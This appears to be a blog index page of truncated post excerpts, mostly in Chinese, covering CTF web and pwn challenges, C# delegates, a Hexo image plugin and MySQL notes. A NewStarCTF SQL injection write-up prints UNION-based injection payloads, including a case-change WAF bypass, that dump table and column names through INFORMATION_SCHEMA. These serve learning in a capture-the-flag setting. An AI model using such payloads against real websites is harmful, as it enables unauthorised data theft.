Pocon's Blog

CTF SHOW Web89~150plus Web89123456789101112include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; ...

委托与事件委托实际上用类完成了函数指针的功能 使用步骤声明1delegate void Print(int x) //只能在namespace和类下 初始化，赋值12Print someFunc = hello；Print someFunc = new Print(hello); 调用委托变量1someFunc(30); 例子12345public delegate void PrintInt(int x)public void Hello(int x) => Console.WriteLIne($"{x}");PrintINt writeInt = Hello(354); 多播委托多播委托将多个函数对象分配到一个委托示例 委托的分配动作是通过 += 、-= 完成的（可以用=。...

hexo-asset-img English | 中文 :cake: Hexo local image plugin: Convert the relative path of the image to asset_img IntroUse this plug-in to realize the preview of Markdown editors such as Typora and Hexo release preview, both of which can display pictures normally Usage1npm install hexo-asset-img --save Latest Dev 1npm install git://github.com/yiyungent/hexo-asset-img.git#main 12345hexo-typora├── apppicker.jpg├── logo.png└── rules.jpghexo-typora.md Make sure post_asset_folder: true...

hexo-asset-img English | 中文 :cake: Hexo 本地图片插件: 转换 图片相对路径 为 asset_img 介绍使用本插件 即可实现 Typora 等 Markdown 编辑器预览 与 Hexo 发布预览 均能正常显示图片 使用1npm install hexo-asset-img --save 最新开发版 1npm install git://github.com/yiyungent/hexo-asset-img.git#main 12345hexo-typora├── apppicker.jpg├── logo.png└── rules.jpghexo-typora.md Make sure post_asset_folder: true in your _config.yml. hexo-typora.md: Just use  to insert logo.png. 与 Typora 配合使用 Hexo + Typora + 开发Hexo插件...

从0开始的Pwn生活与其说是题解，不如说是萌新初次见面的哦哈呦 Ret2text没得说，复习的时候再写 更权威的查找后门函数方法： ctrl + F搜索 system shift + F12看有没有字符串 /bin/sh Ret2ShellCode第一次的思路查看保护 保护 = ZERO 32位 IDA下静态调试 setvbuf是清空缓冲区。简单来说就是说不要设置输入输出缓冲区，不然没满发不出去。 这个gets很关键，基本判别是溢出解法。 执行内容位把s的值赋给buf2 让我们查看下buf2的位置 ​ ...

来源： [0002.哔哩哔哩-【个人向】CTF pwn 入门-P2高清版]_哔哩哔哩_bilibili PPT链接PWN.pptx - Microsoft PowerPoint Online 第一节：可执行文件、ELF文件结构探讨从test.c到a.out的过程。研究一下a.out的结构 第二节：程序装载和运行内存 节视图是放在磁盘中划分功能的，段视图是程序装载到内存中来划分不同读写权限的。 看图说话： [IMPORTANT] 权限相同的节归在一起成了段。 这个合并的过程是由 Linker 来完成的 从ELF文件到虚拟内存空间这个映射过程是由操作系统（OS）来完成的 ...

[NewStarCTF 2023 公开赛道]ez_sql 判断闭合方式为 ’（单引号） 爆字段数，以成功联合注入 ​ ?id=1' order by 1 --+ ​ 发现有WAF，这里使用大写绕过 ​ ?id=1' Order by 1 --+ ​ 一直尝试直到?id=1' Order by 6 --+没有回显，说明字段数为5 联合注入爆数据库名 ​ 可见，数据库名就是ctf ​ 到这里答案就是到手的鸭子了 顺藤摸瓜，找到表名 ?id=1' UNION SELECT 1,2,3,4,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA ='ctf' --+ ​ ​ 显然flag在here_is_flag这个表中，但我们先要找到在哪个字段下（当然一般可以直接猜出来字段名为flag） 再找到字段名 ​ ?id=1' UNION SELECT 1,2,3,4,GROUP_CONCAT(column_name)...

[NewStarCTF 2023 公开赛道]ez_sql 判断闭合方式为 ’（单引号） 爆字段数，以成功联合注入 ​ ?id=1' order by 1 --+ ​ 发现有WAF，这里使用大写绕过 ​ ?id=1' Order by 1 --+ ​ 一直尝试直到?id=1' Order by 6 --+没有回显，说明字段数为5 联合注入爆数据库名 ​ 可见，数据库名就是ctf ​ 到这里答案就是到手的鸭子了 顺藤摸瓜，找到表名 ?id=1' UNION SELECT 1,2,3,4,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA ='ctf' --+ ​ ​ 显然flag在here_is_flag这个表中，但我们先要找到在哪个字段下（当然一般可以直接猜出来字段名为flag） 再找到字段名 ​ ?id=1' UNION SELECT 1,2,3,4,GROUP_CONCAT(column_name)...

MySQL特性 图内补充：table_schema ： 表归属于的数据库 information_schema：这是一个mysql自带的库，其中保存着关于mysql服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表列的数据类型与访问权限等，所以我们查询这个库 查询当前用户：select user（） 数据库版本： select version （） 数据库名： select database（） 查看数据库/表：show databases/tables； 切换数据库： use 数据库名 基础查询：select 字段1， 字段2, … from 表名； select * from 表名； 条件查询：select 字段 from 表名 where 条件 联合查询：select * from 表名 union select 1，2，3 排序： select * from 表名 order by 字段 SQL注入常见类型按注入点类型分类数字型注入当输入的参数x为整形时，即select * from <表名 > where id...

MySQL特性 图内补充：table_schema ： 表归属于的数据库 information_schema：这是一个mysql自带的库，其中保存着关于mysql服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表列的数据类型与访问权限等，所以我们查询这个库 查询当前用户：select user（） 数据库版本： select version （） 数据库名： select database（） 查看数据库/表：show databases/tables； 切换数据库： use 数据库名 基础查询：select 字段1， 字段2, … from 表名； select * from 表名； 条件查询：select 字段 from 表名 where 条件 联合查询：select * from 表名 union select 1，2，3 排序： select * from 表名 order by 字段 SQL注入常见类型按注入点类型分类数字型注入当输入的参数x为整形时，即select * from <表名 > where id...